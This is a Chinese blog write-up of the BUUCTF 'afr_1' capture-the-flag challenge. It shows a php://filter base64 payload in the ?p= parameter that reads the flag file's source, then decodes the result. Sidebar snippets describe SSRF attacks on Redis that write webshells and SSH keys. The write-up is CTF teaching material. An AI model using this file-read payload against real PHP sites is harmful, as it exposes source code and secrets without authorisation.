《从0到1:CTFer成长之路》--afr_1 BUUCTF

最新推荐文章于 2024-05-14 07:39:16 发布
最新推荐文章于 2024-05-14 07:39:16 发布
阅读量4k 收藏 3
点赞数 1
分类专栏: ctf
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyaowangchuan/article/details/109757355
版权

在这里插入图片描述
任意文件读取漏洞
在这里插入图片描述
发现了?p=hello,然后页面回显了hello world
因为提示了是文件读取漏洞
在这里插入图片描述
没有回显
因为刚刚也是?p=hello没有后缀,猜测后台有自己加后缀
在这里插入图片描述
在这里插入图片描述

php的filter读取一下

 ?p=php://filter/read=convert.base64-encode/resource=flag

在这里插入图片描述
PD9waHAKZGllKCdubyBubyBubycpOwovL24xYm9va3thZnJfMV9zb2x2ZWR9
base64解码
在这里插入图片描述
n1book{afr_1_solved}

wuyaoooo
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
读书笔记:从0到1.pdf
10-04
读书笔记:从0到1.pdf
ctfhub -afr -1 2 3
m0_57954651的博客
11-18 1162
补充(Linux系统上的/proc目录是一种文件系统 即proc文件系统 与其它常见的文件系统不同的是 /proc是一种伪文件系统(也即虚拟文件系统) 存储的是当前内核运行状态的一系列特殊文件 用户可以通过这些文件查看有关系统硬件及当前正在运行进程的信息 甚至可以通过更改其中某些文件来改变内核的运行状态。发现flag在flag.py flask的appkey在key.py 但是此处任意文件读取漏洞被过滤了关键词flag。p=flag 回显了 no no no。默认的传参数据为?
2024年最新《从0到1:CTFer成长之路》2,2024年最新物联网嵌入式开发岗
最新发布
2401_85013357的博客
05-14 765
攻击者通过SSRF漏洞未授权访问内网Redis,可能导致任意增、查、删、改其中的内容,甚至利用导出功能写入Crontab、Webshell和SSH公钥(使用导出功能写入的文件所有者为redis的启动用户,一般启动用户为root,如果启动用户权限较低,将无法完成攻击)。Redis是一条指令执行一个行为,如果其中一条指令是错误的,那么会继续读取下一条,所以如果发送的报文中可以控制其中一行,就可以将其修改为Redis指令,分批执行指令,完成攻击。首先,FastCGI本质上是一个协议,在CGI的基础上进行了优化。
ctfhub afr-2
weixin_63810302的博客
09-28 989
ctfhub afr-2
[第一章 web入门]afr_1
qq_43618536的博客
07-24 813
[第一章 web入门]afr_1
从0到1CTFer成长之路——1git(全网最详细)
m0_52555753的博客
11-15 1289
网络安全
ALM-Board-Manual-V1.9.zip_Air-fuel ratio_The Chip_cj125_oxygen s
07-14
ALM (Accurate Lambda Meter) is an air- fuel -ratio (AFR) meter which uses the Bosch LSU4.9 wideband oxygen sensor and Bosch semiconductor chip CJ125 to accurately measure the AFR or lambda for ...
AFR.zip_RP Java_afr 48a_cad java_java cad_them
09-19
A system that takes CAD drawings as input and apply automatic feature recognition methods on them to identify different features present in them. The feature will then populate in a tree in the system...
士研电机液面控制器AFR-1说明书.pdf
09-11
士研电机液面控制器AFR-1说明书pdf,士研电机液面控制器AFR-1说明书:适用于控制任何导电液体之液面,用于交流电,具有突波保护装置,可有效的防止突波干扰,电极头使用低交流电压,可增加寿命,有两只指示灯,指示供水...
AFR1:改写AFR
03-19
"AFR1:改写AFR"这个标题可能指的是一个特定的VBA项目或模块,其目标是对"AFR"(可能是“非洲”、“空气燃料比”或其他特定术语的缩写)进行重新设计或优化。描述中提到的同样内容,进一步确认了这是一个关于AFR的VBA...
afr-f1.github.io
03-27
【标题】"afr-f1.github.io"是一个GitHub托管的个人或组织的网站项目,通常用于展示个人作品、博客文章或者开源项目的文档。这个标题暗示了这是一个基于静态页面生成的项目,很可能使用了GitHub Pages服务。 【描述...
BUUCTF[第一章 web入门]afr_1
hivjianxian的博客
11-22 527
ctf题解
《从0到1:CTFer成长之路》 配套题目Web WP
热门推荐
feng的博客
10-05 1万+
前言 自己刚学了CTF两个月,深感入门CTF的困难。非常感谢Nu1L战队可以编写这本一本非常详实而且全面的CTF书籍,为许许多多像我这样的弱鸡提供了入门的帮助。 自己是Web方向,虽然学了两个月,但是并不是很系统的对Web进行学习。非要给个定位的话,自己现在顶多算是0.2,距离这本书的从0到1还有很大的差距。因此为了提高自己,真正的成为1,自己买了这本书而且要努力的进行学习。 这本书的配套题目可以说给了自己学习知识的同时进行实践的机会。本来不想写WP的,因为考虑到Nu1L的微信公众号已经给出了WP。不过自己
渗透测试---CTF成长之路(一)
broing55的博客
04-22 705
CTF成长之路----------路漫漫其修远兮,吾将上下而求索。 进入题目发现是一个所谓的工控云管理系统,点了几下发现都是没有超链接的 通过查看源代码找到登陆页面和注册页面是真是存在链接的。注册账号后发现提示“普通用户登录成功,没什么用”。所以联想到考点可能是越权,发现cookie的user字段为加密的md5解密还原后重新加密为自定义内容发现无法切换为其他用户,之后尝试注入发现也无...
CTF成长之路(一)
qq_26243045的博客
02-16 188
这段时间一直在看CTF的资料,所以打算把这段时间刷到的一些比较典型的题写出来分享一下,长期连载。
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
weixin_46703850的博客
02-26 3318
《从0到1:CTFer成长之路》书籍配套题目-[第二章 web进阶]死亡ping命令
从0到1——CTFer成长之路(一)
youngerll的博客
03-08 3983
这里写自定义目录标题从0到1——CTFer成长之路(一)Docker安装 从0到1——CTFer成长之路(一) 此书将习题放在docker上,想做习题要先布置docker环境。 Docker安装 Windows商业版可以直接安装,懒得做系统,家庭版可以在VM虚拟机中直接安装。 下载ubuntu20系统及VM15; 安装docker。 ubuntu系统安装: 1.选择英语可以避免后期安装软件改文路径名称。 2.接着是漫长的等待; 3.等待完,右键桌面打开终端。 4.docker安装 ①终端apt
i春秋《从0到1:CTFer成长之路》通关WP
07-08 4395
1、常见的搜集 题目内容:一共3部分flag 使用目录扫描工具,如:7kb-webpathbrute对该URL进行扫描: 打开第一个URL: 发现flag文件flag1_is_her3_fun.txt文件,访问即可得到flag1:n1book{info_1 打开第二个URL: 可以得到flag2:s_v3ry_im 打开第3个URL,下载index.php.swp,打开可以得到第3个flag3:p0rtant_hack}: 组合即可得到完整flag:n1book{info_1
AFR_FSDK_FACEMODEL
11-10
AFR_FSDK_FACEMODEL是虹软人脸识别SDK中的一个结构体,用于存储人脸特征数据。该结构体包含两个成员变量:pbFeatur和FeaturSiz。其中,pbFeatur是一个指向人脸特征数据的指针,FeaturSiz是人脸特征数据的长度。通过将人脸图像输入到虹软人脸识别SDK中,可以得到一个AFR_FSDK_FACEMODEL结构体,该结构体中存储了该人脸的特征数据。在进行人脸比对时,只需要将两个人脸的特征数据进行比对即可。\n\

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值